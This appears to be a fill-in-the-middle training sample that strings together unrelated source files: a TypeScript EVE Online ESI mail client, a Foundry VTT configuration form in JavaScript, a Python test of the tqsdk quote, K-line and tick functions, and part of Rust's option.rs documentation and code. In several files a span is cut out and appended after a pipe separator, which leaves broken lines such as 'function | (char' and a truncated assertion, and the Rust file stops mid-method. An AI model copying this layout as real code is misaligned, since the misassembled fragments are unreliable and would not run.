* @param id The label id
* @returns A Label API wrapper
*/
(id: number): Label;
/**
* @esi_route get_characters_character_id_mail_labels [labels]
* @esi_example esi.characters(1, 'token').mail.labels()
*
* @returns Details for all of a character's mail labels
*/
(): Promise<esi.character.mail.Label[]>;
/**
* @esi_example esi.characters(1, 'token').mail.labels.add({...})
*
* @param settings The initial state of the new label
* @returns The new label's id
*/
add(settings: esi.character.mail.NewLabel): Promise<Responses['post_characters_character_id_mail_labels']>;
}
/**
* An api adapter over the end points handling the mail inbox for a character
* via functions in the [mail](https://esi.evetech.net/latest/#/Mail) ESI
* endpoints.
*/
export interface Mail {
/**
* @esi_example esi.characters(1, 'token').mail()
*
* @param labelIds If empty, no filtering is performed, otherwise the set
* of labels the returned message headers are restricted to
* @param lastMailId {Number} If not provided, the most recent mails are
* returned, otherwise only messages older than the given id are returned
* @returns List of message headers in the character's inbox
*/
(labelIds?: number[],
lastMailId?: number): Promise<Responses['get_characters_character_id_mail']>;
/**
* Get a Message instance for the given message or mail id.
*
* @param id The message id
* @returns An API wrapper providing access to the given message
*/
(id: number): Message;
/**
* A Labels instance for this character, allowing access to the labels they
* have created.
*/
labels: Labels;
/**
* This makes a request to the `labels` route and then filters the result
* to just return the total unread count.
*
* @esi_route get_characters_character_id_mail_labels [total_unread_count]
* @esi_returns total_unread_count
* @esi_example esi.characters(1, 'token').mail.unreadCount()
*
* @returns The total number of unread messages in a character's inbox
*/
unreadCount(): Promise<number>;
/**
* @esi_route post_characters_character_id_cspa
* @esi_example esi.characters(1, 'token').mail.cspaCost()
*
* @param toIds Array of entities to potentially send a mail to
* @returns The cspa cost for sending a message to the given entities
*/
cspaCost(toIds: number[]): Promise<number>;
/**
* Fetch all mails for the character as a single array. Use with caution as
* certain characters could have substantial amounts of mail.
*
* @returns All message headers in the character's inbox
*/
all(): Promise<Responses['get_characters_character_id_mail']>;
/**
* @esi_example esi.characters(1, 'token').mail.send({...})
*
* @param mail The mail specification
* @return The sent mail's id
*/
send(mail: esi.character.mail.NewMail): Promise<Responses['post_characters_character_id_mail']>;
/**
* @esi_example esi.characters(1, 'token').mail.lists()
*
* @returns List of details for a character's mailing list memberships
*/
lists(): Promise<Responses['get_characters_character_id_mail_lists']>;
}
/**
* Create a new {@link Mail} instance that uses the given character agent to
* make its HTTP requests to the ESI interface.
*
* @param char The character access information
* @returns An Mail API instance
*/
export function makeMail(char: SSOAgent): Mail {
let mail = <Mail> <any> function (messageIDorLabels?: number | number[],
lastMailId?: number) {
// Matching to the inbox function when the second argument exists (since
// 2nd function only takes 1 argument), or if the first argument is an
// array or undefined.
if (messageIDorLabels === undefined || Array.isArray(messageIDorLabels)
|| lastMailId !== undefined) {
return char.agent.request('get_characters_character_id_mail', {
path: { character_id: char.id },
query: { labels: <number[]|undefined> messageIDorLabels, last_mail_id: lastMailId }
}, char.ssoToken);
} else {
return new MessageImpl(char, messageIDorLabels);
}
};
let allMail: PaginatedLoader<esi.character.mail.MailHeader> = makeIDBasedLoader(
maxID => mail(undefined, maxID), item => item.mail_id!, 50);
mail.all = function () {
return allMail.getAll();
};
mail.labels = makeLabels(char);
mail.unreadCount = function () {
return char.agent.request('get_characters_character_id_mail_labels',
{ path: { character_id: char.id } }, char.ssoToken)
.then(result => result.total_unread_count || 0);
};
mail.cspaCost = function (to: number[]) {
return char.agent.request('post_characters_character_id_cspa',
{ path: { character_id: char.id }, body: { characters: to } },
char.ssoToken).then(result => result.cost || 0);
};
mail.send = function (mail: esi.character.mail.NewMail) {
return char.agent.request('post_characters_character_id_mail',
{ path: { character_id: char.id }, body: mail }, char.ssoToken);
};
mail.lists = function () {
return char.agent.request('get_characters_character_id_mail_lists',
{ path: { character_id: char.id } }, char.ssoToken);
};
return mail;
}
class MessageImpl implements Message {
constructor(private char: SSOAgent, private id_: number) {
}
info() {
return this.char.agent.request('get_characters_character_id_mail_mail_id',
{ path: { character_id: this.char.id, mail_id: this.id_ } },
this.char.ssoToken);
}
del() {
return this.char.agent.request(
'delete_characters_character_id_mail_mail_id',
{ path: { character_id: this.char.id, mail_id: this.id_ } },
this.char.ssoToken);
}
update(state: esi.character.mail.MailUpdate) {
return this.char.agent.request('put_characters_character_id_mail_mail_id', {
path: { character_id: this.char.id, mail_id: this.id_ },
body: state
}, this.char.ssoToken);
}
id() {
return Promise.resolve(this.id_);
}
}
class LabelImpl implements Label {
constructor(private char: SSOAgent, private id_: number) {
}
del() {
return this.char.agent.request(
'delete_characters_character_id_mail_labels_label_id',
{ path: { character_id: this.char.id, label_id: this.id_ } },
this.char.ssoToken);
}
id() {
return Promise.resolve(this.id_);
}
}
function | (char: SSOAgent): Labels {
let labels = <Labels> <any> function (id?: number) {
if (id === undefined) {
return char.agent.request('get_characters_character_id_mail_labels',
{ path: { character_id: char.id } }, char.ssoToken)
.then(result => result.labels);
} else {
return new LabelImpl(char, id);
}
};
labels.add = function (settings: esi.character.mail.NewLabel) {
return char.agent.request('post_characters_character_id_mail_labels',
{ path: { character_id: char.id }, body: settings }, char.ssoToken);
};
return labels;
}
| makeLabels |
SourceConfigApplication.js | import DEFAULTS from '/modules/mmi/scripts/defaults.js';
import MMI, { validate, SourceFactory } from '/modules/mmi/scripts/main.js';
import DeckConfigApplication from '/modules/mmi/scripts/apps/DeckConfigApplication.js';
/**
* Form application to configure settings of the Deck.
*/
export default class | extends FormApplication {
constructor(object={}, options={}) {
super(object);
}
static get defaultOptions() {
return mergeObject(super.defaultOptions, {
title: 'Mildly Magical Inspiration - Source Configuration',
id: "source-config",
template: './' + DEFAULTS.templatePath + '/source-config.html',
width: 800,
height: "auto",
closeOnSubmit: false,
submitOnChange: false
})
}
getData(options) {
return mergeObject(super.getData().object, {
sources: MMI.sources
});
}
async activateListeners(html) {
super.activateListeners(html);
html.on('click', 'a.source-control', async (event) => {
const sourceId = $(event.target).parent().prop('id');
const actionType = $(event.target).parents('a.source-control').data('action') || $(event.target).data('action');
switch(actionType) {
case 'add':
this.addSource();
break;
case 'edit':
this.openSource(sourceId);
break;
case 'delete':
this.deleteSource(sourceId)
break;
}
});
this.markActive(html);
}
markActive(html) {
const activeSource = html.find('ul.source-list li.isActive label');
const newEl = $('<span></span>');
newEl.css('font-weight', 'bold');
newEl.css('font-style', 'italic');
newEl.text(` (Curently Active)`);
activeSource.append(newEl);
}
addSource() {
MMI.makeDialog({
title: 'Add a new Source',
content: `<p>To use a pre-existing source upload a source-file from your harddrive. The uploader only accepts JSON-files!</p>`,
form: {
name: 'MMI-NewSourceUpload',
type: 'file',
options: { accept: '.json' }
},
buttons: {
fromFile: {
icon: 'fa-file-import',
label: 'Create Source from File',
callback: async () => { this.createFromFile($('input[name=MMI-NewSourceUpload]').prop('files')[0]) }
},
newSource: {
icon: 'fa-forward',
label: 'Skip Uploader',
callback: () => { this.createSource() }
}
},
def: 'newSource',
render: html => { MMI.disableOnEmpty({ target: html.find('button.fromFile'), operator: html.find('input[name="MMI-NewSourceUpload"]') }) }
})
}
async createFromFile(fileData) {
const fileName = fileData.name.split('.');
fileName.pop();
const fileContent = await readTextFromFile(fileData);
let valJSON;
if(validate.json(fileContent)) valJSON = JSON.parse(fileContent);
const validated = validate.source(valJSON);
if(validated) {
if(!validated.title) validated.title = fileName.join(' ');
this.createSource(validated);
}
}
async createSource(data = { title: 'New Source' }) {
const newSource = await SourceFactory.create(data);
this.openSource(newSource._id);
}
openSource(sourceId) {
new DeckConfigApplication({ sourceId }).render(true);
}
async deleteSource(sourceId) {
const source = MMI.getSource(sourceId);
MMI.makeDialog({
title: `Delete Source: ${ source.title }`,
content: `<p>Are you sure you want to delete the source <em>${ source.title }</em>?</p>`,
buttons: {
delete: {
icon: 'fa-check',
label: 'Delete Source',
callback: async () => {
await SourceFactory.removeSource(sourceId);
}
}
}
})
}
async _updateObject(event, formData) {
//
}
} | SourceConfigApplication |
test_md_basic.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import random
import unittest
from datetime import datetime
from tqsdk.test.api.helper import MockInsServer, MockServer
from tqsdk import TqApi, TqBacktest
class TestMdBasic(unittest.TestCase):
"""
测试TqApi行情相关函数基本功能, 以及TqApi与行情服务器交互是否符合设计预期
注:
1. 在本地运行测试用例前需设置运行环境变量(Environment variables), 保证api中dict及set等类型的数据序列在每次运行时元素顺序一致: PYTHONHASHSEED=32
2. 若测试用例中调用了会使用uuid的功能函数时(如insert_order()会使用uuid生成order_id),
则:在生成script文件时及测试用例中都需设置 TqApi.RD = random.Random(x), 以保证两次生成的uuid一致, x取值范围为0-2^32
3. 對盤中的測試用例(即非回測):因为TqSim模拟交易 Order 的 insert_date_time 和 Trade 的 trade_date_time 不是固定值,所以改为判断范围。
盘中时:self.assertAlmostEqual(1575292560005832000 / 1e9, order1.insert_date_time / 1e9, places=1)
回测时:self.assertEqual(1575291600000000000, order1.insert_date_time)
"""
def setUp(self):
# self.ins = MockInsServer(5000)
self.mock = MockServer()
# self.tq = WebsocketServer(5300)
self.ins_url = "https://openmd.shinnytech.com/t/md/symbols/2019-07-03.json"
self.md_url = "ws://127.0.0.1:5100/"
self.td_url = "ws://127.0.0.1:5200/"
def tearDown(self):
# self.ins.close()
self.mock.close()
# 获取行情测试
# @unittest.skip("无条件跳过")
def test_get_quote_normal(self):
"""
获取行情报价
"""
# 预设服务器端响应
dir_path = os.path.dirname(os.path.realpath(__file__))
self.mock.run(os.path.join(dir_path, "log_file", "test_md_basic_get_quote_normal.script.lzma"))
# 获取行情
api = TqApi(_ins_url=self.ins_url, _td_url=self.td_url, _md_url=self.md_url)
q = api.get_quote("SHFE.cu1909")
self.assertEqual(q.datetime, "2019-09-16 14:59:59.999500")
self.assertEqual(q.ask_price1, 47650.0)
self.assertEqual(q.ask_volume1, 10)
self.assertEqual(q.bid_price1, 47570.0)
self.assertEqual(q.bid_volume1, 5)
self.assertEqual(q.last_price, 47580.0)
self.assertEqual(q.highest, 47860.0)
self.assertEqual(q.lowest, 47580.0)
self.assertEqual(q.open, 47860.0)
self.assertEqual(q.close, 47580.0)
self.assertEqual(q.average, 47732.35)
self.assertEqual(q.volume, 9020)
self.assertEqual(q.amount, 2152729000.0)
self.assertEqual(q.open_interest, 6940)
self.assertEqual(q.settlement, 47730.0)
self.assertEqual(q.upper_limit, 49650.0)
self.assertEqual(q.lower_limit, 44920)
self.assertEqual(q.pre_open_interest, 13260)
self.assertEqual(q.pre_settlement, 47290.0)
self.assertEqual(q.pre_close, 47590.0)
self.assertEqual(q.price_tick, 10)
self.assertEqual(q.price_decs, 0)
self.assertEqual(q.volume_multiple, 5)
self.assertEqual(q.max_limit_order_volume, 500)
self.assertEqual(q.max_market_order_volume, 0)
self.assertEqual(q.min_limit_order_volume, 0)
self.assertEqual(q.min_market_order_volume, 0)
self.assertEqual(q.underlying_symbol, "")
self.assertTrue(q.strike_price != q.strike_price) # 判定nan
self.assertEqual(q.expired, False)
self.assertEqual(q.ins_class, "FUTURE")
self.assertEqual(q.margin, 16233.000000000002)
self.assertEqual(q.commission, 11.594999999999999)
self.assertEqual(repr(q.trading_time.day),
"[['09:00:00', '10:15:00'], ['10:30:00', '11:30:00'], ['13:30:00', '15:00:00']]")
self.assertEqual(repr(q.trading_time.night), "[['21:00:00', '25:00:00']]")
self.assertEqual(q.expire_datetime, 1568617200.0)
self.assertEqual(q.delivery_month, 9)
self.assertEqual(q.delivery_year, 2019)
self.assertEqual(q.instrument_id, "SHFE.cu1909")
self.assertEqual(q.ask_price2, 47730.0)
self.assertEqual(q.ask_volume2, 10)
self.assertEqual(q.ask_price3, 47990.0)
self.assertEqual(q.ask_volume3, 5)
self.assertEqual(q.ask_price4, 49250.0)
self.assertEqual(q.ask_volume4, 50)
self.assertEqual(q.ask_price5 != q.ask_price5, True) # 判断nan
self.assertEqual(q.ask_volume5, 0)
self.assertEqual(q.bid_price2, 46560.0)
self.assertEqual(q.bid_volume2, 100)
self.assertEqual(q.bid_price3, 45650.0)
self.assertEqual(q.bid_volume3, 270)
self.assertEqual(q.bid_price4, 44920.0)
self.assertEqual(q.bid_volume4, 5)
self.assertEqual(q.bid_price5 != q.bid_price5, True)
self.assertEqual(q.bid_volume5, 0)
# 其他取值方式
self.assertEqual(q["pre_close"], 47590.0)
self.assertEqual(q.get("pre_settlement"), 47290.0)
self.assertEqual(q.get("highest"), 47860.0)
self.assertEqual(q.get("lowest"), 47580.0)
self.assertEqual(q["open"], 47860.0)
self.assertEqual(q["close"], 47580.0)
# 报错测试
self.assertRaises(Exception, api.get_quote, "SHFE.au1999")
self.assertRaises(KeyError, q.__getitem__, "ask_price6")
api.close()
def test_get_kline_serial(self):
"""
获取K线数据
"""
# 预设服务器端响应
dir_path = os.path.dirname(os.path.realpath(__file__))
self.mock.run(os.path.join(dir_path, "log_file", "test_md_basic_get_kline_serial.script.lzma"))
# 测试: 获取K线数据
TqApi.RD = random.Random(1)
api = TqApi(_ins_url=self.ins_url, _td_url=self.td_url, _md_url=self.md_url)
klines = api.get_kline_serial("SHFE.cu1909", 10)
self.assertEqual(klines.iloc[-1].close, 47580.0)
self.assertEqual(klines.iloc[-1].id, 660788)
self.assertEqual(klines.iloc[-2].id, 660787)
self.assertEqual(klines.iloc[-1].datetime, 1.56861719e+18)
self.assertEqual(klines.iloc[-1].open, 47580)
self.assertEqual(klines.iloc[-1].volume, 0.0)
self.assertEqual(klines.iloc[-1].open_oi, 6940.0)
self.assertEqual(klines.iloc[-1].duration, 10)
# 其他取值方式
self.assertEqual(klines.duration.iloc[-1], 10)
self.assertEqual(klines.iloc[-1]["duration"], 10)
self.assertEqual(klines["duration"].iloc[-1], 10)
# 报错测试
self.assertRaises(Exception, api.get_kline_serial, "SHFE.au1999", 10)
self.assertRaises(AttributeError, klines.iloc[-1].__getattribute__, "dur")
self.assertRaises(KeyError, klines.iloc[-1].__getitem__, "dur")
api.close()
def test_get_tick_serial(self):
"""
获取tick数据
"""
# 预设服务器端响应
dir_path = os.path.dirname(os.path.realpath(__file__))
self.mock.run(os.path.join(dir_path, "log_file", "test_md_basic_get_tick_serial.script.lzma"))
# 测试: 获取tick数据
TqApi.RD = random.Random(2)
api = TqApi(_ins_url=self.ins_url, _td_url=self.td_url, _md_url=self.md_url)
ticks = api.get_tick_serial("SHFE.cu1909")
self.assertEqual(ticks.iloc[-1].id, 2822951.0)
| l(ticks.iloc[-1].datetime, 1.5686171999995e+18)
self.assertEqual(ticks.iloc[-1].last_price, 47580)
self.assertEqual(ticks.iloc[-1].average, 47732.3516)
self.assertEqual(ticks.iloc[-1].highest, 47860)
self.assertEqual(ticks.iloc[-1].lowest, 47580)
self.assertEqual(ticks.iloc[-1].ask_price1, 47650)
self.assertEqual(ticks.iloc[-1].ask_volume1, 10)
self.assertEqual(ticks.iloc[-1].bid_price1, 47570)
self.assertEqual(ticks.iloc[-1].bid_volume1, 5)
self.assertEqual(ticks.iloc[-1].volume, 9020)
self.assertEqual(ticks.iloc[-1].amount, 2152729000.0)
self.assertEqual(ticks.iloc[-1].open_interest, 6940)
self.assertEqual(ticks.iloc[-1].duration, 0)
# 其他调用方式
self.assertEqual(ticks.open_interest.iloc[-1], 6940)
self.assertEqual(ticks["open_interest"].iloc[-2], 6940)
self.assertEqual(ticks.iloc[-1]["ask_price1"], 47650)
# 报错测试
self.assertRaises(Exception, api.get_tick_serial, "SHFE.au1999")
self.assertRaises(AttributeError, ticks.iloc[-1].__getattribute__, "dur")
self.assertRaises(KeyError, ticks.iloc[-1].__getitem__, "dur")
api.close()
| self.assertEqua |
option.rs | // Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Optional values.
//!
//! Type [`Option`] represents an optional value: every [`Option`]
//! is either [`Some`] and contains a value, or [`None`], and
//! does not. [`Option`] types are very common in Rust code, as
//! they have a number of uses:
//!
//! * Initial values
//! * Return values for functions that are not defined
//! over their entire input range (partial functions)
//! * Return value for otherwise reporting simple errors, where `None` is
//! returned on error
//! * Optional struct fields
//! * Struct fields that can be loaned or "taken"
//! * Optional function arguments
//! * Nullable pointers
//! * Swapping things out of difficult situations
//!
//! [`Option`]s are commonly paired with pattern matching to query the presence
//! of a value and take action, always accounting for the [`None`] case.
//!
//! ```
//! fn divide(numerator: f64, denominator: f64) -> Option<f64> {
//! if denominator == 0.0 {
//! None
//! } else {
//! Some(numerator / denominator)
//! }
//! }
//!
//! // The return value of the function is an option
//! let result = divide(2.0, 3.0);
//!
//! // Pattern match to retrieve the value
//! match result {
//! // The division was valid
//! Some(x) => println!("Result: {}", x),
//! // The division was invalid
//! None => println!("Cannot divide by 0"),
//! }
//! ```
//!
//
// FIXME: Show how `Option` is used in practice, with lots of methods
//
//! # Options and pointers ("nullable" pointers)
//!
//! Rust's pointer types must always point to a valid location; there are
//! no "null" pointers. Instead, Rust has *optional* pointers, like
//! the optional owned box, [`Option`]`<`[`Box<T>`]`>`.
//!
//! The following example uses [`Option`] to create an optional box of
//! [`i32`]. Notice that in order to use the inner [`i32`] value first, the
//! `check_optional` function needs to use pattern matching to
//! determine whether the box has a value (i.e. it is [`Some(...)`][`Some`]) or
//! not ([`None`]).
//!
//! ```
//! let optional = None;
//! check_optional(optional);
//!
//! let optional = Some(Box::new(9000));
//! check_optional(optional);
//!
//! fn check_optional(optional: Option<Box<i32>>) {
//! match optional {
//! Some(ref p) => println!("has value {}", p),
//! None => println!("has no value"),
//! }
//! }
//! ```
//!
//! This usage of [`Option`] to create safe nullable pointers is so
//! common that Rust does special optimizations to make the
//! representation of [`Option`]`<`[`Box<T>`]`>` a single pointer. Optional pointers
//! in Rust are stored as efficiently as any other pointer type.
//!
//! # Examples
//!
//! Basic pattern matching on [`Option`]:
//!
//! ```
//! let msg = Some("howdy");
//!
//! // Take a reference to the contained string
//! if let Some(ref m) = msg {
//! println!("{}", *m);
//! }
//!
//! // Remove the contained string, destroying the Option
//! let unwrapped_msg = msg.unwrap_or("default message");
//! ```
//!
//! Initialize a result to [`None`] before a loop:
//!
//! ```
//! enum Kingdom { Plant(u32, &'static str), Animal(u32, &'static str) }
//!
//! // A list of data to search through.
//! let all_the_big_things = [
//! Kingdom::Plant(250, "redwood"),
//! Kingdom::Plant(230, "noble fir"),
//! Kingdom::Plant(229, "sugar pine"),
//! Kingdom::Animal(25, "blue whale"),
//! Kingdom::Animal(19, "fin whale"),
//! Kingdom::Animal(15, "north pacific right whale"),
//! ];
//!
//! // We're going to search for the name of the biggest animal,
//! // but to start with we've just got `None`.
//! let mut name_of_biggest_animal = None;
//! let mut size_of_biggest_animal = 0;
//! for big_thing in &all_the_big_things {
//! match *big_thing {
//! Kingdom::Animal(size, name) if size > size_of_biggest_animal => {
//! // Now we've found the name of some big animal
//! size_of_biggest_animal = size;
//! name_of_biggest_animal = Some(name);
//! }
//! Kingdom::Animal(..) | Kingdom::Plant(..) => ()
//! }
//! }
//!
//! match name_of_biggest_animal {
//! Some(name) => println!("the biggest animal is {}", name),
//! None => println!("there are no animals :("),
//! }
//! ```
//!
//! [`Option`]: enum.Option.html
//! [`Some`]: enum.Option.html#variant.Some
//! [`None`]: enum.Option.html#variant.None
//! [`Box<T>`]: ../../std/boxed/struct.Box.html
//! [`i32`]: ../../std/primitive.i32.html
#![stable(feature = "rust1", since = "1.0.0")]
use iter::{FromIterator, FusedIterator, TrustedLen};
use {hint, mem, ops::{self, Deref}};
use mem::PinMut;
// Note that this is not a lang item per se, but it has a hidden dependency on
// `Iterator`, which is one. The compiler assumes that the `next` method of
// `Iterator` is an enumeration with one type parameter and two variants,
// which basically means it must be `Option`.
/// The `Option` type. See [the module level documentation](index.html) for more.
#[derive(Clone, Copy, PartialEq, PartialOrd, Eq, Ord, Debug, Hash)]
#[stable(feature = "rust1", since = "1.0.0")]
pub enum Option<T> {
/// No value
#[stable(feature = "rust1", since = "1.0.0")]
None,
/// Some value `T`
#[stable(feature = "rust1", since = "1.0.0")]
Some(#[stable(feature = "rust1", since = "1.0.0")] T),
}
/////////////////////////////////////////////////////////////////////////////
// Type implementation
/////////////////////////////////////////////////////////////////////////////
impl<T> Option<T> {
/////////////////////////////////////////////////////////////////////////
// Querying the contained values
/////////////////////////////////////////////////////////////////////////
/// Returns `true` if the option is a [`Some`] value.
///
/// # Examples
///
/// ```
/// let x: Option<u32> = Some(2);
/// assert_eq!(x.is_some(), true);
///
/// let x: Option<u32> = None;
/// assert_eq!(x.is_some(), false);
/// ```
///
/// [`Some`]: #variant.Some
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_some(&self) -> bool {
match *self {
Some(_) => true,
None => false,
}
}
/// Returns `true` if the option is a [`None`] value.
///
/// # Examples
///
/// ```
/// let x: Option<u32> = Some(2);
/// assert_eq!(x.is_none(), false);
///
/// let x: Option<u32> = None;
/// assert_eq!(x.is_none(), true);
/// ```
///
/// [`None`]: #variant.None
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_none(&self) -> bool {
!self.is_some()
}
/////////////////////////////////////////////////////////////////////////
// Adapter for working with references
/////////////////////////////////////////////////////////////////////////
/// Converts from `Option<T>` to `Option<&T>`.
///
/// # Examples
///
/// Convert an `Option<`[`String`]`>` into an `Option<`[`usize`]`>`, preserving the original.
/// The [`map`] method takes the `self` argument by value, consuming the original,
/// so this technique uses `as_ref` to first take an `Option` to a reference
/// to the value inside the original.
///
/// [`map`]: enum.Option.html#method.map
/// [`String`]: ../../std/string/struct.String.html
/// [`usize`]: ../../std/primitive.usize.html
///
/// ```
/// let text: Option<String> = Some("Hello, world!".to_string());
/// // First, cast `Option<String>` to `Option<&String>` with `as_ref`,
/// // then consume *that* with `map`, leaving `text` on the stack.
/// let text_length: Option<usize> = text.as_ref().map(|s| s.len());
/// println!("still can print text: {:?}", text);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn as_ref(&self) -> Option<&T> {
match *self {
Some(ref x) => Some(x),
None => None,
}
}
/// Converts from `Option<T>` to `Option<&mut T>`.
///
/// # Examples
///
/// ```
/// let mut x = Some(2);
/// match x.as_mut() {
/// Some(v) => *v = 42,
/// None => {},
/// }
/// assert_eq!(x, Some(42));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn as_mut(&mut self) -> Option<&mut T> {
match *self {
Some(ref mut x) => Some(x),
None => None,
}
}
/// Converts from `Option<T>` to `Option<PinMut<'_, T>>`
#[inline]
#[unstable(feature = "pin", issue = "49150")]
pub fn as_pin_mut<'a>(self: PinMut<'a, Self>) -> Option<PinMut<'a, T>> {
unsafe {
PinMut::get_mut_unchecked(self).as_mut().map(|x| PinMut::new_unchecked(x))
}
}
/////////////////////////////////////////////////////////////////////////
// Getting to contained values
/////////////////////////////////////////////////////////////////////////
/// Unwraps an option, yielding the content of a [`Some`].
///
/// # Panics
///
/// Panics if the value is a [`None`] with a custom panic message provided by
/// `msg`.
///
/// [`Some`]: #variant.Some
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let x = Some("value");
/// assert_eq!(x.expect("the world is ending"), "value");
/// ```
///
/// ```{.should_panic}
/// let x: Option<&str> = None;
/// x.expect("the world is ending"); // panics with `the world is ending`
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn expect(self, msg: &str) -> T {
match self {
Some(val) => val,
None => expect_failed(msg),
}
}
/// Moves the value `v` out of the `Option<T>` if it is [`Some(v)`].
///
/// In general, because this function may panic, its use is discouraged.
/// Instead, prefer to use pattern matching and handle the [`None`]
/// case explicitly.
///
/// # Panics
///
/// Panics if the self value equals [`None`].
///
/// [`Some(v)`]: #variant.Some
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let x = Some("air");
/// assert_eq!(x.unwrap(), "air");
/// ```
///
/// ```{.should_panic}
/// let x: Option<&str> = None;
/// assert_eq!(x.unwrap(), "air"); // fails
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap(self) -> T {
match self {
Some(val) => val,
None => panic!("called `Option::unwrap()` on a `None` value"),
}
}
/// Returns the contained value or a default.
///
/// Arguments passed to `unwrap_or` are eagerly evaluated; if you are passing
/// the result of a function call, it is recommended to use [`unwrap_or_else`],
/// which is lazily evaluated.
///
/// [`unwrap_or_else`]: #method.unwrap_or_else
///
/// # Examples
///
/// ```
/// assert_eq!(Some("car").unwrap_or("bike"), "car");
/// assert_eq!(None.unwrap_or("bike"), "bike");
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap_or(self, def: T) -> T {
match self {
Some(x) => x,
None => def,
}
}
/// Returns the contained value or computes it from a closure.
///
/// # Examples
///
/// ```
/// let k = 10;
/// assert_eq!(Some(4).unwrap_or_else(|| 2 * k), 4);
/// assert_eq!(None.unwrap_or_else(|| 2 * k), 20);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap_or_else<F: FnOnce() -> T>(self, f: F) -> T {
match self {
Some(x) => x,
None => f(),
}
}
/////////////////////////////////////////////////////////////////////////
// Transforming contained values
/////////////////////////////////////////////////////////////////////////
/// Maps an `Option<T>` to `Option<U>` by applying a function to a contained value.
///
/// # Examples
///
/// Convert an `Option<`[`String`]`>` into an `Option<`[`usize`]`>`, consuming the original:
///
/// [`String`]: ../../std/string/struct.String.html
/// [`usize`]: ../../std/primitive.usize.html
///
/// ```
/// let maybe_some_string = Some(String::from("Hello, World!"));
/// // `Option::map` takes self *by value*, consuming `maybe_some_string`
/// let maybe_some_len = maybe_some_string.map(|s| s.len());
///
/// assert_eq!(maybe_some_len, Some(13));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn map<U, F: FnOnce(T) -> U>(self, f: F) -> Option<U> {
match self {
Some(x) => Some(f(x)),
None => None,
}
}
/// Applies a function to the contained value (if any),
/// or returns the provided default (if not).
///
/// # Examples
///
/// ```
/// let x = Some("foo");
/// assert_eq!(x.map_or(42, |v| v.len()), 3);
///
/// let x: Option<&str> = None;
/// assert_eq!(x.map_or(42, |v| v.len()), 42);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn map_or<U, F: FnOnce(T) -> U>(self, default: U, f: F) -> U {
match self {
Some(t) => f(t),
None => default,
}
}
/// Applies a function to the contained value (if any),
/// or computes a default (if not).
///
/// # Examples
///
/// ```
/// let k = 21;
///
/// let x = Some("foo");
/// assert_eq!(x.map_or_else(|| 2 * k, |v| v.len()), 3);
///
/// let x: Option<&str> = None;
/// assert_eq!(x.map_or_else(|| 2 * k, |v| v.len()), 42);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn map_or_else<U, D: FnOnce() -> U, F: FnOnce(T) -> U>(self, default: D, f: F) -> U {
match self {
Some(t) => f(t),
None => default(),
}
}
/// Transforms the `Option<T>` into a [`Result<T, E>`], mapping [`Some(v)`] to
/// [`Ok(v)`] and [`None`] to [`Err(err)`].
///
/// Arguments passed to `ok_or` are eagerly evaluated; if you are passing the
/// result of a function call, it is recommended to use [`ok_or_else`], which is
/// lazily evaluated.
///
/// [`Result<T, E>`]: ../../std/result/enum.Result.html
/// [`Ok(v)`]: ../../std/result/enum.Result.html#variant.Ok
/// [`Err(err)`]: ../../std/result/enum.Result.html#variant.Err
/// [`None`]: #variant.None
/// [`Some(v)`]: #variant.Some
/// [`ok_or_else`]: #method.ok_or_else
///
/// # Examples
///
/// ```
/// let x = Some("foo");
/// assert_eq!(x.ok_or(0), Ok("foo"));
///
/// let x: Option<&str> = None;
/// assert_eq!(x.ok_or(0), Err(0));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn ok_or<E>(self, err: E) -> Result<T, E> {
match self {
Some(v) => Ok(v),
None => Err(err),
}
}
/// Transforms the `Option<T>` into a [`Result<T, E>`], mapping [`Some(v)`] to
/// [`Ok(v)`] and [`None`] to [`Err(err())`].
///
/// [`Result<T, E>`]: ../../std/result/enum.Result.html
/// [`Ok(v)`]: ../../std/result/enum.Result.html#variant.Ok
/// [`Err(err())`]: ../../std/result/enum.Result.html#variant.Err
/// [`None`]: #variant.None
/// [`Some(v)`]: #variant.Some
///
/// # Examples
///
/// ```
/// let x = Some("foo");
/// assert_eq!(x.ok_or_else(|| 0), Ok("foo"));
///
/// let x: Option<&str> = None;
/// assert_eq!(x.ok_or_else(|| 0), Err(0));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn ok_or_else<E, F: FnOnce() -> E>(self, err: F) -> Result<T, E> {
match self {
Some(v) => Ok(v),
None => Err(err()),
}
}
/////////////////////////////////////////////////////////////////////////
// Iterator constructors
/////////////////////////////////////////////////////////////////////////
/// Returns an iterator over the possibly contained value.
///
/// # Examples
///
/// ```
/// let x = Some(4);
/// assert_eq!(x.iter().next(), Some(&4));
///
/// let x: Option<u32> = None;
/// assert_eq!(x.iter().next(), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn iter(&self) -> Iter<T> {
Iter { inner: Item { opt: self.as_ref() } }
}
/// Returns a mutable iterator over the possibly contained value.
///
/// # Examples
///
/// ```
/// let mut x = Some(4);
/// match x.iter_mut().next() {
/// Some(v) => *v = 42,
/// None => {},
/// }
/// assert_eq!(x, Some(42));
///
/// let mut x: Option<u32> = None;
/// assert_eq!(x.iter_mut().next(), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn iter_mut(&mut self) -> IterMut<T> {
